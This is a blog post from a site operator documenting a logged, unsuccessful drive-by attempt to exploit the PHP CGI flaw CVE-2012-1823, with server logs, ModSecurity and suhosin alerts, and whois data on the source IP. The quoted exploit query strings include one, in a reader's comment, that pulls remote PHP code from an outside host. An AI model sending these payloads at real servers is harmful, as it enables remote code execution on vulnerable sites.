May 112012
 

Attack Introduction

This post demonstrates the security issues faced by websites in a potentially hostile environment like the internet. The following information shows an untargeted and unsuccessful drive-by attack attempt. What is interesting about this attack is the timeline from the initial vulnerability description to the logged exploit attempt.

Vulnerability Description

From CVE -2012-1823 – sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the ‘d’ case.

  • CVE – 2012-1823
  • OSVDB – 81633
  • URL – http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
  • Metasploit URL – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/php_cgi_arg_injection.rb
  • Google – “-d allow_url_include=on -d auto_prepend_file=php://input -d safe_mode=1 -d suhosin.simulation=1 -d disable_functions=”
  • Disclosure Date – May 03 2012
  • Attack Date – May 11 2012

Attack Access.log

  • 85.114.141.40 – – [11/May/2012:16:59:31 +0100] “POST //?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input+-d+safe_mode%3d1+-d+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+-d+open_basedir%3dnone+-n HTTP/1.0” 301 655 “-” “-“

Attack Error.log

  • [Fri May 11 16:59:31 2012] [error] [client 85.114.141.40] ModSecurity: Warning. Pattern match “(?i:(?:union\\s*(?:all|distinct|[([email protected]]*)?\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+(“|’|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98))|(?:like\\s*(“|’|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\%)|(?:(“|’|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\s*like\\W*[(“|’|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\d])|(?:(“|’|`|\xc2\xb4|\xe2\x80\x99|\xe2\x80\x98)\\s*(?:n?and|x?x?or|div|like|between|and|not |\\|\\|| …” at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input -d safe_mode=1 -d suhosin.simulation=1 -d disable_functions=”” -d open_basedir=none -n. [file “/etc/apache2/sites-modsecurity-crs/base_rules/modsecurity_crs_41_sql_injection_attacks.conf”] [line “578”] [id “981245”] [msg “Detects basic SQL authentication bypass attempts 2/3”] [data “\\x22 -d o”] [severity “CRITICAL”] [tag “WEB_ATTACK/SQLI”] [tag “WEB_ATTACK/ID”] [tag “WEB_ATTACK/LFI”] [hostname “syndicate.ourpractice.org”] [uri “/”] [unique_id “T603Y7JPpf4AACx2xJgAAAAD”]

Attack Alert

  • May 11 16:59:31 li303-254 suhosin[11382]: ALERT – configured request variable name length limit exceeded – dropped variable ‘-d_allow_url_include=on_-d_auto_prepend_file=php://input_-d_safe_mode=1_-d_suhosin_simulation=1_-d_disable_functions=””_-d_open_basedir=none_-n’ (attacker ‘85.114.141.40’, file ‘/var/www/ourprac-pub/index.php’)

nslookup 85.114.141.40

Non-authoritative answer:

  • 40.141.114.85.in-addr.arpa name = s040.silver.fastwebserver.de.

whois 85.114.141.40

% Information related to ‘85.114.140.0 – 85.114.143.255’

inetnum: 85.114.140.0 – 85.114.143.255
netname: FASTIT-DE-DUS1-COLO8
descr: fast IT Colocation
country: DE

role: fast IT Operations Team
address: myLoc managed IT AG
address: Am Gatherhof 44
address: 40472 Duesseldorf
address: DE
abuse-mailbox: [email protected]
phone: +49 211 171659 0
fax-no: +49 211 171659 77

role: fibre one NOC
address: fibre one networks GmbH
address: Network Operations & Services
address: Am Gatherhof 44
address: 40472 Duesseldorf
address: Germany
abuse-mailbox: [email protected]
phone: +49 211 171659 40
fax-no: +49 211 171659 49

Hill Street Blues

So that’s 8 days from the disclosure date to a drive-by attack attempt, to quote Sergeant Esterhaus out of context “Let’s Be Careful Out There,”, and to 85.114.141.40 “Auf Wiedersehen Pet!!”.

4,197 total views, 2 views today

  One Response to “CVE-2012-1823: PHP CGI Advisory”

  1. And another attempt from the access.log …

    69.61.106.55 – – [18/Jun/2012:13:41:28 +0100] “POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.0” 302 294 “-” “Mozilla/5.0”

 Leave a Reply

*

© 2011 Indimon Internet Services

Site last updated March 11, 2017 @ 9:57 am; This content last updated June 29, 2012 @ 2:49 pm

Return to Top ▲Return to Top ▲